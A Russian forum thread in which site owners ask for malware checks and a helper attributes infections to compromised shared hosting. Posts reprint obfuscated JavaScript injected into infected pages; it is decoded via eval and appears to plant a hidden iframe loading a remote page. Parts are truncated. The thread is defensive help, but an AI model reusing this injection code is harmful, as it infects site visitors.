Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

  • Автор темы Автор темы akok
  • Дата начала Дата начала
Ivan_Petrov написал(а):
Так если я скачаю его на комп, каспер сможет его обнаружить и удалить?
Нажмите для раскрытия...
Обнаружить может, а вот удалить вопрос. Скорее всего он удалит файл полностью.

Ivan_Petrov написал(а):
На этом же хостинге стоят еще несколько ресурсов, при заходе на них так же выдает сообщение что обнаружен троян.
Нажмите для раскрытия...

Обратитесь к хостеру, похоже сервер был взломан, а это в свою очередь может привести к тому, что вы не обнаружите следов взлома в скрипте.

Ivan_Petrov написал(а):
или на моем локальном компьютере он сидит?
Нажмите для раскрытия...
Судить сложно, но можно проверить
 
Спасибо, за советы, обязательно проверю. Хостеру сообщил, обещали разобраться в проблеме.
 
Уважаемый, akoK

Не могли бы вы точно указать, в каком файле содержится данный вредоносный код. Второй день вручную не могу найти...

Добавлено через 13 минут 25 секунд
сайт хтмл://rap-russ.ru/
 
san4elllo написал(а):
Не могли бы вы точно указать, в каком файле содержится данный вредоносный код. Второй день вручную не могу найти...
Нажмите для раскрытия...

Нашел ваших соседей по серверу. У них аналогичные проблемы.... вредоносный код цепляет скомпрометированный сервер, а не скрипт.
 
akoK написал(а):
Нашел ваших соседей по серверу. У них аналогичные проблемы.... вредоносный код цепляет скомпрометированный сервер, а не скрипт.
Нажмите для раскрытия...

Спасибо, что уделили внимание. Что делать в такой ситуации? Писать гневные письма хостеру, что бы чистил вирусы?
И если переехать на другой хостинг, вирус останется на сайте/сайтах?

Надеюсь на вашу поддержку.
 
san4elllo написал(а):
Писать гневные письма хостеру, что бы чистил вирусы?
Нажмите для раскрытия...
В точку, только они смогут решить эту проблему.


san4elllo написал(а):
И если переехать на другой хостинг, вирус останется на сайте/сайтах?
Нажмите для раскрытия...
Нет, если скрипт не заражен, но все равно нужно будет менять FTP пароли и пароли администратора(ов).
 
akoK, огромное спасиб, пойду писать ахтунги и поковать монатки для переезда)
 
Проверьте, пожалста, этот сайт - хттп://www.sinematika.ru/. Сам я ничего не обнаруживаю, но знакомый говорит что вроде троян там.
 
Есть признаки заражения:

В конце страницы транслируется
PHP: 
<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var yp={me:11896,wpf:function(){createCSS("#c0","background: url(data:,eva)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var eyc=r[i].cssRules||r[i].rules;for(var id=0;id<eyc.length;id++){var ctvk=eyc.item?eyc.item(id):eyc[id];if(!ctvk.selectorText.match(/#c(\d+)/))conti******rl\("?data\:[^,]*,([^")]+)"?\)/)[1];};}catch(e){};}
var ffi=[11887,11887,11791,11794*11779,11787,11795,11786,11780,11850,11793,11795,11780,11827,11788,11795,11787,11795,11786,11780,11781,11830,11775,11812,11799,11793,11818,11799,11787,11795,11856,11857,11798,11785,11796,11775,11857,11855,11805,11848,11803,11855,11773,11883,11887,11887,11887,11791,11794,11782,11799,11787,11795,11782,11856,11855,11837,11883,11887,11887,11771,11864,11795,11788,11781,11795,11864,11773,11883,11887,11887,11887,11778,11799,11782,11864,11798,11796,11775,11864,11835,11864,11796,11785,11797,11779,11787,11795,11786,11780,11850,11797,11782,11795,11799,11780,11795,11827,11788,11795,11787,11795,11786,11780,11856,11862,11798,11785,11796,11775,11862,11855,11837,11883,11887,11887,11887,11780,11782,11775,11864,11773,11883,11887,11887,11887,11887,11796,11785,11797,11779,11787,11795,11786,11780,11850,11799,11784,11784,11795,11786,11796,11829,11792,11791,11788,11796,11856,11798,11796,11775,11855,11837,11883,11887,11887,11887,11771,11864,11797,11799,11780,11797,11792,11864,11856,11795,11855,11864,11773,11883,11887,11887,11887,11887,11796,11785,11797,11779,11787,11795,11786,11780,11850,11798,11785,11796,11775,11864,11835,11864,11798,11796,11775,11837,11883,11887,11887,11887,11771,11883,11887,11887,11887,11791,11794,11864,11856,11796,11785,11797,11779,11787,11795,11786,11780,11850,11793,11795,11780,11827,11788,11795,11787,11795,11786,11780,11781,11830,11775,11812,11799,11793,11818,11799,11787,11795,11856,11857,11798,11785,11796,11775,11857,11855,11805,11848,11803,11855,11773,11883,11887,11887,11887,11887,11791,11794,11782,11799,11787,11795,11782,11856,11855,11837,11883,11887,11887,11887,11771,11864,11795,11788,11781,11795,11864,11773,11883,11887,11887,11887,11887,11796,11785,11797,11779,11787,11795,11786,11780,11850,11777,11782,11791,11780,11795,11856,11862,11836,11791,11794,11782,11799,11787,11795,11864,11781,11782,11797,11835,11857,11792,11780,11780,11784,11838,11849,11849,11784,11791,11797,11792,11795,11780,11799,11850,11786,11795,11780,11849,11797,11785,11785,11788,11795,11782,11850,11784,11792,11784,11857,11864,11777,11791,11796,11780,11792,11835,11857,11847,11848,11857,11864,11792,11795,11791,11793,11792,11780,11835,11857,11847,11848,11857,11864,11781,11780,11775,11788,11795,11835,11857,11778,11791,11781,11791,11798,11791,11788,11791,11780,11775,11838,11792,11791,11796,11796,11795,11786,11837,11784,11785,11781,11791,11780,11791,11785,11786,11838,11799,11798,11781,11785,11788,11779,11780,11795,11837,11788,11795,11794,11780,11838,11848,11837,11780,11785,11784,11838,11848,11837,11857,11834,11836,11849,11791,11794,11782,11799,11787,11795,11834,11862,11855,11837,11883,11887,11887,11887,11771,11883,11887,11887,11771,11883,11887,11887,11794,11779,11786,11797,11780,11791,11785,11786,11864,11791,11794,11782,11799,11787,11795,11782,11856,11855,11773,11883,11887,11887,11887,11778,11799,11782,11864,11794,11864,11835,11864,11796,11785,11797,11779,11787,11795,11786,11780,11850,11797,11782,11795,11799,11780,11795,11827,11788,11795,11787,11795,11786,11780,11856,11857,11791,11794,11782,11799,11787,11795,11857,11855,11837,11794,11850,11781,11795,11780,11831,11780,11780,11782,11791,11798,11779,11780,11795,11856,11857,11781,11782,11797,11857,11852,11857,11792,11780,11780,11784,11838,11849,11849,11784,11791,11797,11792,11795,11780,11799,11850,11786,11795,11780,11849,11797,11785,11785,11788,11795,11782,11850,11784,11792,11784,11857,11855,11837,11794,11850,11781,11780,11775,11788,11795,11850,11778,11791,11781,11791,11798,11791,11788,11791,11780,11775,11835,11857,11792,11791,11796,11796,11795,11786,11857,11837,11794,11850,11781,11780,11775,11788,11795,11850,11784,11785,11781,11791,11780,11791,11785,11786,11835,11857,11799,11798,11781,11785,11788,11779,11780,11795,11857,11837,11794,11850,11781,11780,11775,11788,11795,11850,11788,11795,11794,11780,11835,11857,11848,11857,11837,11794,11850,11781,11780,11775,11788,11795,11850,11780,11785,11784,11835,11857,11848,11857,11837,11794,11850,11781,11795,11780,11831,11780,11780,11782,11791,11798,11779,11780,11795,11856,11857,11777,11791,11796,11780,11792,11857,11852,11857,11847,11848,11857,11855,11837,11794,11850,11781,11795,11780,11831,11780,11780,11782,11791,11798,11779,11780,11795,11856,11857,11792,11795,11791,11793,11792,11780,11857,11852,11857,11847,11848,11857,11855,11837,11883,11887,11887,11887,11796,11785,11797,11779,11787,11795,11786,11780,11850,11793,11795,11780,11827,11788,11795,11787,11795,11786,11780,11781,11830,11775,11812,11799,11793,11818,11799,11787,11795,11856,11857,11798,11785,11796,11775,11857,11855,11805,11848,11803,11850,11799,11784,11784,11795,11786,11796,11829,11792,11791,11788,11796,11856,11794,11855,11837,11883,11887,11887,11771];var s="";jq=eval(my+"l");wb=String.fromCharCode;for(var i=0;i<ffi.length;i++){re=yp.me-parseInt(ffi[i]);s+=(wb(re));}
jq(s);}};yp.wpf();</script>
 
akoK написал(а):
Есть признаки заражения:

В конце страницы транслируется
PHP: 
<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var yp={me:11896,wpf:function(){createCSS("#c0","background: url(data:,eva)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var eyc=r[i].cssRules||r[i].rules;for(var id=0;id<eyc.length;id++){var ctvk=eyc.item?eyc.item(id):eyc[id];if(!ctvk.selectorText.match(/#c(\d+)/))conti******rl\("?data\:[^,]*,([^")]+)"?\)/)[1];};}catch(e){};}
var ffi=[11887,11887,11791,11794*11779,11787,11795,11786,11780,11850,11793,11795,11780,11827,11788,11795,11787,11795,11786,11780,11781,11830,11775,11812,11799,11793,11818,11799,11787,11795,11856,11857,11798,11785,11796,11775,11857,11855,11805,11848,11803,11855,11773,11883,11887,11887,11887,11791,11794,11782,11799,11787,11795,11782,11856,11855,11837,11883,11887,11887,11771,11864,11795,11788,11781,11795,11864,11773,11883,11887,11887,11887,11778,11799,11782,11864,11798,11796,11775,11864,11835,11864,11796,11785,11797,11779,11787,11795,11786,11780,11850,11797,11782,11795,11799,11780,11795,11827,11788,11795,11787,11795,11786,11780,11856,11862,11798,11785,11796,11775,11862,11855,11837,11883,11887,11887,11887,11780,11782,11775,11864,11773,11883,11887,11887,11887,11887,11796,11785,11797,11779,11787,11795,11786,11780,11850,11799,11784,11784,11795,11786,11796,11829,11792,11791,11788,11796,11856,11798,11796,11775,11855,11837,11883,11887,11887,11887,11771,11864,11797,11799,11780,11797,11792,11864,11856,11795,11855,11864,11773,11883,11887,11887,11887,11887,11796,11785,11797,11779,11787,11795,11786,11780,11850,11798,11785,11796,11775,11864,11835,11864,11798,11796,11775,11837,11883,11887,11887,11887,11771,11883,11887,11887,11887,11791,11794,11864,11856,11796,11785,11797,11779,11787,11795,11786,11780,11850,11793,11795,11780,11827,11788,11795,11787,11795,11786,11780,11781,11830,11775,11812,11799,11793,11818,11799,11787,11795,11856,11857,11798,11785,11796,11775,11857,11855,11805,11848,11803,11855,11773,11883,11887,11887,11887,11887,11791,11794,11782,11799,11787,11795,11782,11856,11855,11837,11883,11887,11887,11887,11771,11864,11795,11788,11781,11795,11864,11773,11883,11887,11887,11887,11887,11796,11785,11797,11779,11787,11795,11786,11780,11850,11777,11782,11791,11780,11795,11856,11862,11836,11791,11794,11782,11799,11787,11795,11864,11781,11782,11797,11835,11857,11792,11780,11780,11784,11838,11849,11849,11784,11791,11797,11792,11795,11780,11799,11850,11786,11795,11780,11849,11797,11785,11785,11788,11795,11782,11850,11784,11792,11784,11857,11864,11777,11791,11796,11780,11792,11835,11857,11847,11848,11857,11864,11792,11795,11791,11793,11792,11780,11835,11857,11847,11848,11857,11864,11781,11780,11775,11788,11795,11835,11857,11778,11791,11781,11791,11798,11791,11788,11791,11780,11775,11838,11792,11791,11796,11796,11795,11786,11837,11784,11785,11781,11791,11780,11791,11785,11786,11838,11799,11798,11781,11785,11788,11779,11780,11795,11837,11788,11795,11794,11780,11838,11848,11837,11780,11785,11784,11838,11848,11837,11857,11834,11836,11849,11791,11794,11782,11799,11787,11795,11834,11862,11855,11837,11883,11887,11887,11887,11771,11883,11887,11887,11771,11883,11887,11887,11794,11779,11786,11797,11780,11791,11785,11786,11864,11791,11794,11782,11799,11787,11795,11782,11856,11855,11773,11883,11887,11887,11887,11778,11799,11782,11864,11794,11864,11835,11864,11796,11785,11797,11779,11787,11795,11786,11780,11850,11797,11782,11795,11799,11780,11795,11827,11788,11795,11787,11795,11786,11780,11856,11857,11791,11794,11782,11799,11787,11795,11857,11855,11837,11794,11850,11781,11795,11780,11831,11780,11780,11782,11791,11798,11779,11780,11795,11856,11857,11781,11782,11797,11857,11852,11857,11792,11780,11780,11784,11838,11849,11849,11784,11791,11797,11792,11795,11780,11799,11850,11786,11795,11780,11849,11797,11785,11785,11788,11795,11782,11850,11784,11792,11784,11857,11855,11837,11794,11850,11781,11780,11775,11788,11795,11850,11778,11791,11781,11791,11798,11791,11788,11791,11780,11775,11835,11857,11792,11791,11796,11796,11795,11786,11857,11837,11794,11850,11781,11780,11775,11788,11795,11850,11784,11785,11781,11791,11780,11791,11785,11786,11835,11857,11799,11798,11781,11785,11788,11779,11780,11795,11857,11837,11794,11850,11781,11780,11775,11788,11795,11850,11788,11795,11794,11780,11835,11857,11848,11857,11837,11794,11850,11781,11780,11775,11788,11795,11850,11780,11785,11784,11835,11857,11848,11857,11837,11794,11850,11781,11795,11780,11831,11780,11780,11782,11791,11798,11779,11780,11795,11856,11857,11777,11791,11796,11780,11792,11857,11852,11857,11847,11848,11857,11855,11837,11794,11850,11781,11795,11780,11831,11780,11780,11782,11791,11798,11779,11780,11795,11856,11857,11792,11795,11791,11793,11792,11780,11857,11852,11857,11847,11848,11857,11855,11837,11883,11887,11887,11887,11796,11785,11797,11779,11787,11795,11786,11780,11850,11793,11795,11780,11827,11788,11795,11787,11795,11786,11780,11781,11830,11775,11812,11799,11793,11818,11799,11787,11795,11856,11857,11798,11785,11796,11775,11857,11855,11805,11848,11803,11850,11799,11784,11784,11795,11786,11796,11829,11792,11791,11788,11796,11856,11794,11855,11837,11883,11887,11887,11771];var s="";jq=eval(my+"l");wb=String.fromCharCode;for(var i=0;i<ffi.length;i++){re=yp.me-parseInt(ffi[i]);s+=(wb(re));}
jq(s);}};yp.wpf();</script>
Нажмите для раскрытия...

Не могу найти и убить этот вредоносный код, возможно проблема в хостере? И еще - может посоветуете чем качественно проверить сайт, если все же вирус будет удален? И почему гугля не реагирует на трояна?
 
Loken написал(а):
Не могу найти и убить этот вредоносный код, возможно проблема в хостере?
Нажмите для раскрытия...
Возможно заражен сервер.


Loken написал(а):
И еще - может посоветуете чем качественно проверить сайт, если все же вирус будет удален?
Нажмите для раскрытия...
После чистки обратиться в вирлаб


Loken написал(а):
И почему гугля не реагирует на трояна?
Нажмите для раскрытия...
Google не так часто проверяет сайт на наличие вредоносного ПО.
 
Здравствуйте. Посмотрите сайты на одном хостинге zemlia-nika.ru (joomla), natintort.ru (wp). На них поселился троян Trojan-Downloader.HTML.Agent.sj

Как его удалить? Виноват ли здесь хостер?
 
Сейчас активного заражения не вижу. Позже попробую проверить еще раз.

Сайты у одного хостера находятся?
 
Вообще, есть очень удобный сервис - McAfee Secure, также существует аналогичный сервис от компании Symantec.
Дороговато, конечно. но своих денег стоит.
 
Rashevskiy, а если нет денег? :)


Di-m-on, в конце страницы natintort.ru транслируется:
PHP: 
<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};****
puny=new Date(2010,11,3,2,21,4);t=puny.getSeconds();var rpzc=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc[i]);hx.call(nqwy);mv+=hx(nqwy);}
qf(mv);</script>
 
Вредоносный скрипт динамически подгружается. Не можем его уловить. То он есть на странице, то его нет. Как от него избавится?
 

Похожие темы

N
сайт рухнул в поиске, помогите проверить на вредоносное по
Ответы
7
Просмотры
2K
akok
akok
magirus
  • Закрыта
прошу проверить сайт kazus.ru
Ответы
2
Просмотры
3K
magirus
magirus
BLO100
  • Закрыта
Прошу проверить сайт mafcup.ucoz.ru/
Ответы
5
Просмотры
3K
akok
akok
Назад
Сверху Снизу